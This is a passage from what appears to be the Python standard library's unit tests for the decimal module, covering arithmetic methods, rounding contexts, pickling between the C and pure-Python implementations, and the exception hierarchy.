self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.min(101, context=None))
self.assertEqual(ans, '101')
self.assertRaises(InvalidOperation, x.min, Decimal('sNaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.min_mag(101, context=None))
self.assertEqual(ans, '101')
self.assertRaises(InvalidOperation, x.min_mag, Decimal('sNaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.remainder_near(101, context=None))
self.assertEqual(ans, '10')
self.assertRaises(InvalidOperation, y.remainder_near, 101, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.rotate(2, context=None))
self.assertEqual(ans, '11100')
self.assertRaises(InvalidOperation, x.rotate, 101, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.scaleb(7, context=None))
self.assertEqual(ans, '1.11E+9')
self.assertRaises(InvalidOperation, x.scaleb, 10000, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.shift(2, context=None))
self.assertEqual(ans, '11100')
self.assertRaises(InvalidOperation, x.shift, 10000, context=None)
self.assertTrue(c.flags[InvalidOperation])
##### Ternary functions
c.clear_flags()
ans = str(x.fma(2, 3, context=None))
self.assertEqual(ans, '225')
self.assertRaises(Overflow, x.fma, Decimal('1e9999'), 3, context=None)
self.assertTrue(c.flags[Overflow])
##### Special cases
c.rounding = ROUND_HALF_EVEN
ans = str(Decimal('1.5').to_integral(rounding=None, context=None))
self.assertEqual(ans, '2')
c.rounding = ROUND_DOWN
ans = str(Decimal('1.5').to_integral(rounding=None, context=None))
self.assertEqual(ans, '1')
ans = str(Decimal('1.5').to_integral(rounding=ROUND_UP, context=None))
self.assertEqual(ans, '2')
c.clear_flags()
self.assertRaises(InvalidOperation, Decimal('sNaN').to_integral, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.rounding = ROUND_HALF_EVEN
ans = str(Decimal('1.5').to_integral_value(rounding=None, context=None))
self.assertEqual(ans, '2')
c.rounding = ROUND_DOWN
ans = str(Decimal('1.5').to_integral_value(rounding=None, context=None))
self.assertEqual(ans, '1')
ans = str(Decimal('1.5').to_integral_value(rounding=ROUND_UP, context=None))
self.assertEqual(ans, '2')
c.clear_flags()
self.assertRaises(InvalidOperation, Decimal('sNaN').to_integral_value, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.rounding = ROUND_HALF_EVEN
ans = str(Decimal('1.5').to_integral_exact(rounding=None, context=None))
self.assertEqual(ans, '2')
c.rounding = ROUND_DOWN
ans = str(Decimal('1.5').to_integral_exact(rounding=None, context=None))
self.assertEqual(ans, '1')
ans = str(Decimal('1.5').to_integral_exact(rounding=ROUND_UP, context=None))
self.assertEqual(ans, '2')
c.clear_flags()
self.assertRaises(InvalidOperation, Decimal('sNaN').to_integral_exact, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.rounding = ROUND_UP
ans = str(Decimal('1.50001').quantize(exp=Decimal('1e-3'), rounding=None, context=None))
self.assertEqual(ans, '1.501')
c.rounding = ROUND_DOWN
ans = str(Decimal('1.50001').quantize(exp=Decimal('1e-3'), rounding=None, context=None))
self.assertEqual(ans, '1.500')
ans = str(Decimal('1.50001').quantize(exp=Decimal('1e-3'), rounding=ROUND_UP, context=None))
self.assertEqual(ans, '1.501')
c.clear_flags()
self.assertRaises(InvalidOperation, y.quantize, Decimal('1e-10'), rounding=ROUND_UP, context=None)
self.assertTrue(c.flags[InvalidOperation])
with localcontext(Context()) as context:
context.prec = 7
context.Emax = 999
context.Emin = -999
with localcontext(ctx=None) as c:
self.assertEqual(c.prec, 7)
self.assertEqual(c.Emax, 999)
self.assertEqual(c.Emin, -999)
def test_conversions_from_int(self):
# Check that methods taking a second Decimal argument will
# always accept an integer in place of a Decimal.
Decimal = self.decimal.Decimal
self.assertEqual(Decimal(4).compare(3),
Decimal(4).compare(Decimal(3)))
self.assertEqual(Decimal(4).compare_signal(3),
Decimal(4).compare_signal(Decimal(3)))
self.assertEqual(Decimal(4).compare_total(3),
Decimal(4).compare_total(Decimal(3)))
self.assertEqual(Decimal(4).compare_total_mag(3),
Decimal(4).compare_total_mag(Decimal(3)))
self.assertEqual(Decimal(10101).logical_and(1001),
Decimal(10101).logical_and(Decimal(1001)))
self.assertEqual(Decimal(10101).logical_or(1001),
Decimal(10101).logical_or(Decimal(1001)))
self.assertEqual(Decimal(10101).logical_xor(1001),
Decimal(10101).logical_xor(Decimal(1001)))
self.assertEqual(Decimal(567).max(123),
Decimal(567).max(Decimal(123)))
self.assertEqual(Decimal(567).max_mag(123),
Decimal(567).max_mag(Decimal(123)))
self.assertEqual(Decimal(567).min(123),
Decimal(567).min(Decimal(123)))
self.assertEqual(Decimal(567).min_mag(123),
Decimal(567).min_mag(Decimal(123)))
self.assertEqual(Decimal(567).next_toward(123),
Decimal(567).next_toward(Decimal(123)))
self.assertEqual(Decimal(1234).quantize(100),
Decimal(1234).quantize(Decimal(100)))
self.assertEqual(Decimal(768).remainder_near(1234),
Decimal(768).remainder_near(Decimal(1234)))
self.assertEqual(Decimal(123).rotate(1),
Decimal(123).rotate(Decimal(1)))
self.assertEqual(Decimal(1234).same_quantum(1000),
Decimal(1234).same_quantum(Decimal(1000)))
self.assertEqual(Decimal('9.123').scaleb(-100),
Decimal('9.123').scaleb(Decimal(-100)))
self.assertEqual(Decimal(456).shift(-1),
Decimal(456).shift(Decimal(-1)))
self.assertEqual(Decimal(-12).fma(Decimal(45), 67),
Decimal(-12).fma(Decimal(45), Decimal(67)))
self.assertEqual(Decimal(-12).fma(45, 67),
Decimal(-12).fma(Decimal(45), Decimal(67)))
self.assertEqual(Decimal(-12).fma(45, Decimal(67)),
Decimal(-12).fma(Decimal(45), Decimal(67)))
class CUsabilityTest(UsabilityTest):
decimal = C
class PyUsabilityTest(UsabilityTest):
decimal = P
class PythonAPItests(unittest.TestCase):
def test_abc(self):
Decimal = self.decimal.Decimal
self.assertTrue(issubclass(Decimal, numbers.Number))
self.assertFalse(issubclass(Decimal, numbers.Real))
self.assertIsInstance(Decimal(0), numbers.Number)
self.assertNotIsInstance(Decimal(0), numbers.Real)
def test_pickle(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
Decimal = self.decimal.Decimal
savedecimal = sys.modules['decimal']
# Round trip
sys.modules['decimal'] = self.decimal
d = Decimal('-3.141590000')
p = pickle.dumps(d, proto)
e = pickle.loads(p)
self.assertEqual(d, e)
if C:
# Test interchangeability
x = C.Decimal('-3.123e81723')
y = P.Decimal('-3.123e81723')
sys.modules['decimal'] = C
sx = pickle.dumps(x, proto)
sys.modules['decimal'] = P
r = pickle.loads(sx)
self.assertIsInstance(r, P.Decimal)
self.assertEqual(r, y)
sys.modules['decimal'] = P
sy = pickle.dumps(y, proto)
sys.modules['decimal'] = C
r = pickle.loads(sy)
self.assertIsInstance(r, C.Decimal)
self.assertEqual(r, x)
x = C.Decimal('-3.123e81723').as_tuple()
y = P.Decimal('-3.123e81723').as_tuple()
sys.modules['decimal'] = C
sx = pickle.dumps(x, proto)
sys.modules['decimal'] = P
r = pickle.loads(sx)
self.assertIsInstance(r, P.DecimalTuple)
self.assertEqual(r, y)
sys.modules['decimal'] = P
sy = pickle.dumps(y, proto)
sys.modules['decimal'] = C
r = pickle.loads(sy)
self.assertIsInstance(r, C.DecimalTuple)
self.assertEqual(r, x)
sys.modules['decimal'] = savedecimal
def test_int(self):
Decimal = self.decimal.Decimal
for x in range(-250, 250):
s = '%0.2f' % (x / 100.0)
# should work the same as for floats
self.assertEqual(int(Decimal(s)), int(float(s)))
# should work the same as to_integral in the ROUND_DOWN mode
d = Decimal(s)
r = d.to_integral(ROUND_DOWN)
self.assertEqual(Decimal(int(d)), r)
self.assertRaises(ValueError, int, Decimal('-nan'))
self.assertRaises(ValueError, int, Decimal('snan'))
self.assertRaises(OverflowError, int, Decimal('inf'))
self.assertRaises(OverflowError, int, Decimal('-inf'))
def test_trunc(self):
Decimal = self.decimal.Decimal
for x in range(-250, 250):
s = '%0.2f' % (x / 100.0)
# should work the same as for floats
self.assertEqual(int(Decimal(s)), int(float(s)))
# should work the same as to_integral in the ROUND_DOWN mode
d = Decimal(s)
r = d.to_integral(ROUND_DOWN)
self.assertEqual(Decimal(math.trunc(d)), r)
def test_from_float(self):
Decimal = self.decimal.Decimal
class MyDecimal(Decimal):
def __init__(self, _):
self.x = 'y'
self.assertTrue(issubclass(MyDecimal, Decimal))
r = MyDecimal.from_float(0.1)
self.assertEqual(type(r), MyDecimal)
self.assertEqual(str(r),
'0.1000000000000000055511151231257827021181583404541015625')
self.assertEqual(r.x, 'y')
bigint = 12345678901234567890123456789
self.assertEqual(MyDecimal.from_float(bigint), MyDecimal(bigint))
self.assertTrue(MyDecimal.from_float(float('nan')).is_qnan())
self.assertTrue(MyDecimal.from_float(float('inf')).is_infinite())
self.assertTrue(MyDecimal.from_float(float('-inf')).is_infinite())
self.assertEqual(str(MyDecimal.from_float(float('nan'))),
str(Decimal('NaN')))
self.assertEqual(str(MyDecimal.from_float(float('inf'))),
str(Decimal('Infinity')))
self.assertEqual(str(MyDecimal.from_float(float('-inf'))),
str(Decimal('-Infinity')))
self.assertRaises(TypeError, MyDecimal.from_float, 'abc')
for i in range(200):
x = random.expovariate(0.01) * (random.random() * 2.0 - 1.0)
self.assertEqual(x, float(MyDecimal.from_float(x))) # roundtrip
def test_create_decimal_from_float(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
Inexact = self.decimal.Inexact
context = Context(prec=5, rounding=ROUND_DOWN)
self.assertEqual(
context.create_decimal_from_float(math.pi),
Decimal('3.1415')
)
context = Context(prec=5, rounding=ROUND_UP)
self.assertEqual(
context.create_decimal_from_float(math.pi),
Decimal('3.1416')
)
context = Context(prec=5, traps=[Inexact])
self.assertRaises(
Inexact,
context.create_decimal_from_float,
math.pi
)
self.assertEqual(repr(context.create_decimal_from_float(-0.0)),
"Decimal('-0')")
self.assertEqual(repr(context.create_decimal_from_float(1.0)),
"Decimal('1')")
self.assertEqual(repr(context.create_decimal_from_float(10)),
"Decimal('10')")
def test_quantize(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
InvalidOperation = self.decimal.InvalidOperation
c = Context(Emax=99999, Emin=-99999)
self.assertEqual(
Decimal('7.335').quantize(Decimal('.01')),
Decimal('7.34')
)
self.assertEqual(
Decimal('7.335').quantize(Decimal('.01'), rounding=ROUND_DOWN),
Decimal('7.33')
)
self.assertRaises(
InvalidOperation,
Decimal("10e99999").quantize, Decimal('1e100000'), context=c
)
c = Context()
d = Decimal("0.871831e800")
x = d.quantize(context=c, exp=Decimal("1e797"), rounding=ROUND_DOWN)
self.assertEqual(x, Decimal('8.71E+799'))
def test_complex(self):
Decimal = self.decimal.Decimal
x = Decimal("9.8182731e181273")
self.assertEqual(x.real, x)
self.assertEqual(x.imag, 0)
self.assertEqual(x.conjugate(), x)
x = Decimal("1")
self.assertEqual(complex(x), complex(float(1)))
self.assertRaises(AttributeError, setattr, x, 'real', 100)
self.assertRaises(AttributeError, setattr, x, 'imag', 100)
self.assertRaises(AttributeError, setattr, x, 'conjugate', 100)
self.assertRaises(AttributeError, setattr, x, '__complex__', 100)
def test_named_parameters(self):
D = self.decimal.Decimal
Context = self.decimal.Context
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
Overflow = self.decimal.Overflow
xc = Context()
xc.prec = 1
xc.Emax = 1
xc.Emin = -1
with localcontext() as c:
c.clear_flags()
self.assertEqual(D(9, xc), 9)
self.assertEqual(D(9, context=xc), 9)
self.assertEqual(D(context=xc, value=9), 9)
self.assertEqual(D(context=xc), 0)
xc.clear_flags()
self.assertRaises(InvalidOperation, D, "xyz", context=xc)
self.assertTrue(xc.flags[InvalidOperation])
self.assertFalse(c.flags[InvalidOperation])
xc.clear_flags()
self.assertEqual(D(2).exp(context=xc), 7)
self.assertRaises(Overflow, D(8).exp, context=xc)
self.assertTrue(xc.flags[Overflow])
self.assertFalse(c.flags[Overflow])
xc.clear_flags()
self.assertEqual(D(2).ln(context=xc), D('0.7'))
self.assertRaises(InvalidOperation, D(-1).ln, context=xc)
self.assertTrue(xc.flags[InvalidOperation])
self.assertFalse(c.flags[InvalidOperation])
self.assertEqual(D(0).log10(context=xc), D('-inf'))
self.assertEqual(D(-1).next_minus(context=xc), -2)
self.assertEqual(D(-1).next_plus(context=xc), D('-0.9'))
self.assertEqual(D("9.73").normalize(context=xc), D('1E+1'))
self.assertEqual(D("9999").to_integral(context=xc), 9999)
self.assertEqual(D("-2000").to_integral_exact(context=xc), -2000)
self.assertEqual(D("123").to_integral_value(context=xc), 123)
self.assertEqual(D("0.0625").sqrt(context=xc), D('0.2'))
self.assertEqual(D("0.0625").compare(context=xc, other=3), -1)
xc.clear_flags()
self.assertRaises(InvalidOperation,
D("0").compare_signal, D('nan'), context=xc)
self.assertTrue(xc.flags[InvalidOperation])
self.assertFalse(c.flags[InvalidOperation])
self.assertEqual(D("0.01").max(D('0.0101'), context=xc), D('0.0'))
self.assertEqual(D("0.01").max(D('0.0101'), context=xc), D('0.0'))
self.assertEqual(D("0.2").max_mag(D('-0.3'), context=xc),
D('-0.3'))
self.assertEqual(D("0.02").min(D('-0.03'), context=xc), D('-0.0'))
self.assertEqual(D("0.02").min_mag(D('-0.03'), context=xc),
D('0.0'))
self.assertEqual(D("0.2").next_toward(D('-1'), context=xc), D('0.1'))
xc.clear_flags()
self.assertRaises(InvalidOperation,
D("0.2").quantize, D('1e10'), context=xc)
self.assertTrue(xc.flags[InvalidOperation])
self.assertFalse(c.flags[InvalidOperation])
self.assertEqual(D("9.99").remainder_near(D('1.5'), context=xc),
D('-0.5'))
self.assertEqual(D("9.9").fma(third=D('0.9'), context=xc, other=7),
D('7E+1'))
self.assertRaises(TypeError, D(1).is_canonical, context=xc)
self.assertRaises(TypeError, D(1).is_finite, context=xc)
self.assertRaises(TypeError, D(1).is_infinite, context=xc)
self.assertRaises(TypeError, D(1).is_nan, context=xc)
self.assertRaises(TypeError, D(1).is_qnan, context=xc)
self.assertRaises(TypeError, D(1).is_snan, context=xc)
self.assertRaises(TypeError, D(1).is_signed, context=xc)
self.assertRaises(TypeError, D(1).is_zero, context=xc)
self.assertFalse(D("0.01").is_normal(context=xc))
self.assertTrue(D("0.01").is_subnormal(context=xc))
self.assertRaises(TypeError, D(1).adjusted, context=xc)
self.assertRaises(TypeError, D(1).conjugate, context=xc)
self.assertRaises(TypeError, D(1).radix, context=xc)
self.assertEqual(D(-111).logb(context=xc), 2)
self.assertEqual(D(0).logical_invert(context=xc), 1)
self.assertEqual(D('0.01').number_class(context=xc), '+Subnormal')
self.assertEqual(D('0.21').to_eng_string(context=xc), '0.21')
self.assertEqual(D('11').logical_and(D('10'), context=xc), 0)
self.assertEqual(D('11').logical_or(D('10'), context=xc), 1)
self.assertEqual(D('01').logical_xor(D('10'), context=xc), 1)
self.assertEqual(D('23').rotate(1, context=xc), 3)
self.assertEqual(D('23').rotate(1, context=xc), 3)
xc.clear_flags()
self.assertRaises(Overflow,
D('23').scaleb, 1, context=xc)
self.assertTrue(xc.flags[Overflow])
self.assertFalse(c.flags[Overflow])
self.assertEqual(D('23').shift(-1, context=xc), 0)
self.assertRaises(TypeError, D.from_float, 1.1, context=xc)
self.assertRaises(TypeError, D(0).as_tuple, context=xc)
self.assertEqual(D(1).canonical(), 1)
self.assertRaises(TypeError, D("-1").copy_abs, context=xc)
self.assertRaises(TypeError, D("-1").copy_negate, context=xc)
self.assertRaises(TypeError, D(1).canonical, context="x")
self.assertRaises(TypeError, D(1).canonical, xyz="x")
def test_exception_hierarchy(self):
decimal = self.decimal
DecimalException = decimal.DecimalException
InvalidOperation = decimal.InvalidOperation
FloatOperation = decimal.FloatOperation
DivisionByZero = decimal.DivisionByZero
Overflow = decimal.Overflow
Underflow = decimal.Underflow
Subnormal = decimal.Subnormal
Inexact = decimal.Inexact
Rounded = decimal.Rounded
Clamped = decimal.Clamped
self.assertTrue(issubclass(DecimalException, ArithmeticError))
self.assertTrue(issubclass(InvalidOperation, DecimalException))
self.assertTrue(issubclass(FloatOperation, DecimalException))
self.assertTrue(issubclass(FloatOperation, TypeError))
self.assertTrue(issubclass(DivisionByZero, DecimalException))
self.assertTrue(issubclass(DivisionByZero, ZeroDivisionError))
self.assertTrue(issubclass(Overflow, Rounded))
self.assertTrue(issubclass(Overflow, Inexact))
self.assertTrue(issubclass(Overflow, DecimalException))
self.assertTrue(issubclass(Underflow, Inexact))
self.assertTrue(issubclass(Underflow, Rounded))
self.assertTrue(issubclass(Underflow, Subnormal))
self.assertTrue(issubclass(Underflow, DecimalException))
self.assertTrue(issubclass(Subnormal, DecimalException))
self.assertTrue(issubclass(Inexact, DecimalException))
self.assertTrue(issubclass(Rounded, DecimalException))
self.assertTrue(issubclass(Clamped, DecimalException))
self.assertTrue(issubclass(decimal.ConversionSyntax, InvalidOperation))
self.assertTrue(issubclass(decimal.DivisionImpossible, InvalidOperation))
self.assertTrue(issubclass(decimal.DivisionUndefined, InvalidOperation))
self.assertTrue(issubclass(decimal.DivisionUndefined, ZeroDivisionError))
self.assertTrue(issubclass(decimal.InvalidContext, InvalidOperation))
class CPythonAPItests(PythonAPItests):
decimal = C
class PyPythonAPItests(PythonAPItests):
decimal = P
class ContextAPItests(unittest.TestCase):
def test_none_args(self):
Context = self.decimal.Context
InvalidOperation = self.decimal.InvalidOperation
DivisionByZero = self.decimal.DivisionByZero
Overflow = self.decimal.Overflow
c1 = Context()
c2 = Context(prec=None, rounding=None, Emax=None, Emin=None,
capitals=None, clamp=None, flags=None, traps=None)
for c in [c1, c2]:
self.assertEqual(c.prec, 28)
self.assertEqual(c.rounding, ROUND_HALF_EVEN)
self.assertEqual(c.Emax, 999999)
self.assertEqual(c.Emin, -999999)
self.assertEqual(c.capitals, 1)
self.assertEqual(c.clamp, 0)
assert_signals(self, c, 'flags', [])
assert_signals(self, c, 'traps', [InvalidOperation, DivisionByZero,
Overflow])
@cpython_only
def test_from_legacy_strings(self):
import _testcapi
c = self.decimal.Context()
for rnd in RoundingModes:
c.rounding = _testcapi.unicode_legacy_string(rnd)
self.assertEqual(c.rounding, rnd)
s = _testcapi.unicode_legacy_string('')
self.assertRaises(TypeError, setattr, c, 'rounding', s)
s = _testcapi.unicode_legacy_string('ROUND_\x00UP')
self.assertRaises(TypeError, setattr, c, 'rounding', s)
def test_pickle(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
Context = self.decimal.Context
savedecimal = sys.modules['decimal']
# Round trip
sys.modules['decimal'] = self.decimal
c = Context()
e = pickle.loads(pickle.dumps(c, proto))
self.assertEqual(c.prec, e.prec)
self.assertEqual(c.Emin, e.Emin)
self.assertEqual(c.Emax, e.Emax)
self.assertEqual(c.rounding, e.rounding)
self.assertEqual(c.capitals, e.capitals)
self.assertEqual(c.clamp, e.clamp)
self.assertEqual(c.flags, e.flags)
self.assertEqual(c.traps, e.traps)
# Test interchangeability
combinations = [(C, P), (P, C)] if C else [(P, P)]
for dumper, loader in combinations:
for ri, _ in enumerate(RoundingModes):
for fi, _ in enumerate(OrderedSignals[dumper]):
for ti, _ in enumerate(OrderedSignals[dumper]):
prec = random.randrange(1, 100)
emin = random.randrange(-100, 0)
emax = random.randrange(1, 100)
caps = random.randrange(2)
clamp = random.randrange(2)
# One module dumps
sys.modules['decimal'] = dumper
c = dumper.Context(
prec=prec, Emin=emin, Emax=emax,
rounding=RoundingModes[ri],
capitals=caps, clamp=clamp,
flags=OrderedSignals[dumper][:fi],
traps=OrderedSignals[dumper][:ti]
)
s = pickle.dumps(c, proto)
# The other module loads
sys.modules['decimal'] = loader
d = pickle.loads(s)
self.assertIsInstance(d, loader.Context)
self.assertEqual(d.prec, prec)
self.assertEqual(d.Emin, emin)
self.assertEqual(d.Emax, emax)
self.assertEqual(d.rounding, RoundingModes[ri])
self.assertEqual(d.capitals, caps)
self.assertEqual(d.clamp, clamp)
assert_signals(self, d, 'flags', OrderedSignals[loader][:fi])
assert_signals(self, d, 'traps', OrderedSignals[loader][:ti])
sys.modules['decimal'] = savedecimal
def test_equality_with_other_types(self):
Decimal = self.decimal.Decimal
self.assertIn(Decimal(10), ['a', 1.0, Decimal(10), (1,2), {}])
self.assertNotIn(Decimal(10), ['a', 1.0, (1,2), {}])
def test_copy(self):
# All copies should be deep
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy()
self.assertNotEqual(id(c), id(d))
self.assertNotEqual(id(c.flags), id(d.flags))
self.assertNotEqual(id(c.traps), id(d.traps))
k1 = set(c.flags.keys())
k2 = set(d.flags.keys())
self.assertEqual(k1, k2)
self.assertEqual(c.flags, d.flags)
def test__clamp(self):
# In Python 3.2, the private attribute `_clamp` was made
# public (issue 8540), with the old `_clamp` becoming a
# property wrapping `clamp`. For the duration of Python 3.2
# only, the attribute should be gettable/settable via both
# `clamp` and `_clamp`; in Python 3.3, `_clamp` should be
# removed.
Context = self.decimal.Context
c = Context()
self.assertRaises(AttributeError, getattr, c, '_clamp')
def test_abs(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.abs(Decimal(-1))
self.assertEqual(c.abs(-1), d)
self.assertRaises(TypeError, c.abs, '-1')
def test_add(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.add(Decimal(1), Decimal(1))
self.assertEqual(c.add(1, 1), d)
self.assertEqual(c.add(Decimal(1), 1), d)
self.assertEqual(c.add(1, Decimal(1)), d)
self.assertRaises(TypeError, c.add, '1', 1)
self.assertRaises(TypeError, c.add, 1, '1')
def test_compare(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.compare(Decimal(1), Decimal(1))
self.assertEqual(c.compare(1, 1), d)
self.assertEqual(c.compare(Decimal(1), 1), d)
self.assertEqual(c.compare(1, Decimal(1)), d)
self.assertRaises(TypeError, c.compare, '1', 1)
self.assertRaises(TypeError, c.compare, 1, '1')
def test_compare_signal(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.compare_signal(Decimal(1), Decimal(1))
self.assertEqual(c.compare_signal(1, 1), d)
self.assertEqual(c.compare_signal(Decimal(1), 1), d)
self.assertEqual(c.compare_signal(1, Decimal(1)), d)
self.assertRaises(TypeError, c.compare_signal, '1', 1)
self.assertRaises(TypeError, c.compare_signal, 1, '1')
def test_compare_total(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.compare_total(Decimal(1), Decimal(1))
self.assertEqual(c.compare_total(1, 1), d)
self.assertEqual(c.compare_total(Decimal(1), 1), d)
self.assertEqual(c.compare_total(1, Decimal(1)), d)
self.assertRaises(TypeError, c.compare_total, '1', 1)
self.assertRaises(TypeError, c.compare_total, 1, '1')
def test_compare_total_mag(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.compare_total_mag(Decimal(1), Decimal(1))
self.assertEqual(c.compare_total_mag(1, 1), d)
self.assertEqual(c.compare_total_mag(Decimal(1), 1), d)
self.assertEqual(c.compare_total_mag(1, Decimal(1)), d)
self.assertRaises(TypeError, c.compare_total_mag, '1', 1)
self.assertRaises(TypeError, c.compare_total_mag, 1, '1')
def test_copy_abs(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy_abs(Decimal(-1))
self.assertEqual(c.copy_abs(-1), d)
self.assertRaises(TypeError, c.copy_abs, '-1')
def test_copy_decimal(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy_decimal(Decimal(-1))
self.assertEqual(c.copy_decimal(-1), d)
self.assertRaises(TypeError, c.copy_decimal, '-1')
def test_copy_negate(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy_negate(Decimal(-1))
self.assertEqual(c.copy_negate(-1), d)
self.assertRaises(TypeError, c.copy_negate, '-1')
def test_copy_sign(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy_sign(Decimal(1), Decimal(-2))
self.assertEqual(c.copy_sign(1, -2), d)
self.assertEqual(c.copy_sign(Decimal(1), -2), d)
self.assertEqual(c.copy_sign(1, Decimal(-2)), d)
self.assertRaises(TypeError, c.copy_sign, '1', -2)
self.assertRaises(TypeError, c.copy_sign, 1, '-2')
def test_divide(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.divide(Decimal(1), Decimal(2))
self.assertEqual(c.divide(1, 2), d)
self.assertEqual(c.divide(Decimal(1), 2), d)
self.assertEqual(c.divide(1, Decimal(2)), d)
self.assertRaises(TypeError, c.divide, '1', 2)
self.assertRaises(TypeError, c.divide, 1, '2')
def test_divide_int(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.divide_int(Decimal(1), Decimal(2))
self.assertEqual(c.divide_int(1, 2), d)
self.assertEqual(c.divide_int(Decimal(1), 2), d)
self.assertEqual(c.divide_int(1, Decimal(2)), d)
self.assertRaises(TypeError, c.divide_int, '1', 2)
self.assertRaises(TypeError, c.divide_int, 1, '2')
def test_divmod(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.divmod(Decimal(1), Decimal(2))
self.assertEqual(c.divmod(1, 2), d)
self.assertEqual(c.divmod(Decimal(1), 2), d)
self.assertEqual(c.divmod(1, Decimal(2)), d)
self.assertRaises(TypeError, c.divmod, '1', 2)
self.assertRaises(TypeError, c.divmod, 1, '2')
def test_exp(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.exp(Decimal(10))
self.assertEqual(c.exp(10), d)
self.assertRaises(TypeError, c.exp, '10')
def test_fma(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.fma(Decimal(2), Decimal(3), Decimal(4))
self.assertEqual(c.fma(2, 3, 4), d)
self.assertEqual(c.fma(Decimal(2), 3, 4), d)
self.assertEqual(c.fma(2, Decimal(3), 4), d)
self.assertEqual(c.fma(2, 3, Decimal(4)), d)
self.assertEqual(c.fma(Decimal(2), Decimal(3), 4), d)
self.assertRaises(TypeError, c.fma, '2', 3, 4)
self.assertRaises(TypeError, c.fma, 2, '3', 4)
self.assertRaises(TypeError, c.fma, 2, 3, '4')
# Issue 12079 for Context.fma ...
self.assertRaises(TypeError, c.fma,
Decimal('Infinity'), Decimal(0), "not a decimal")
self.assertRaises(TypeError, c.fma,
Decimal(1), Decimal('snan'), 1.222)
# ... and for Decimal.fma.
self.assertRaises(TypeError, Decimal('Infinity').fma,
Decimal(0), "not a decimal")
self.assertRaises(TypeError, Decimal(1).fma,
Decimal('snan'), 1.222)
def test_is_finite(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_finite(Decimal(10))
self.assertEqual(c.is_finite(10), d)
self.assertRaises(TypeError, c.is_finite, '10')
def test_is_infinite(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_infinite(Decimal(10))
self.assertEqual(c.is_infinite(10), d)
self.assertRaises(TypeError, c.is_infinite, '10')
def test_is_nan(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_nan(Decimal(10))
self.assertEqual(c.is_nan(10), d)
self.assertRaises(TypeError, c.is_nan, '10')
def test_is_normal(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_normal(Decimal(10))
self.assertEqual(c.is_normal(10), d)
self.assertRaises(TypeError, c.is_normal, '10')
def test_is_qnan(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_qnan(Decimal(10))
self.assertEqual(c.is_qnan(10), d)
self.assertRaises(TypeError, c.is_qnan, '10')
def test_is_signed(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_signed(Decimal(10))
self.assertEqual(c.is_signed(10), d)
self.assertRaises(TypeError, c.is_signed, '10')
def test_is_snan(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_snan(Decimal(10))
self.assertEqual(c.is_snan(10), d)
self.assertRaises(TypeError, c.is_snan, '10')
def test_is_subnormal(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_subnormal(Decimal(10))
self.assertEqual(c.is_subnormal(10), d)
self.assertRaises(TypeError, c.is_subnormal, '10')
def test_is_zero(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_zero(Decimal(10))
self.assertEqual(c.is_zero(10), d)
self.assertRaises(TypeError, c.is_zero, '10')
def test_ln(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.ln(Decimal(10))
self.assertEqual(c.ln(10), d)
self.assertRaises(TypeError, c.ln, '10')
def test_log10(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.log10(Decimal(10))
self.assertEqual(c.log10(10), d)
self.assertRaises(TypeError, c.log10, '10')
def test_logb(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logb(Decimal(10))
self.assertEqual(c.logb(10), d)
self.assertRaises(TypeError, c.logb, '10')
def test_logical_and(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logical_and(Decimal(1), Decimal(1))
self.assertEqual(c.logical_and(1, 1), d)
self.assertEqual(c.logical_and(Decimal(1), 1), d)
self.assertEqual(c.logical_and(1, Decimal(1)), d)
self.assertRaises(TypeError, c.logical_and, '1', 1)
self.assertRaises(TypeError, c.logical_and, 1, '1')
def test_logical_invert(self):
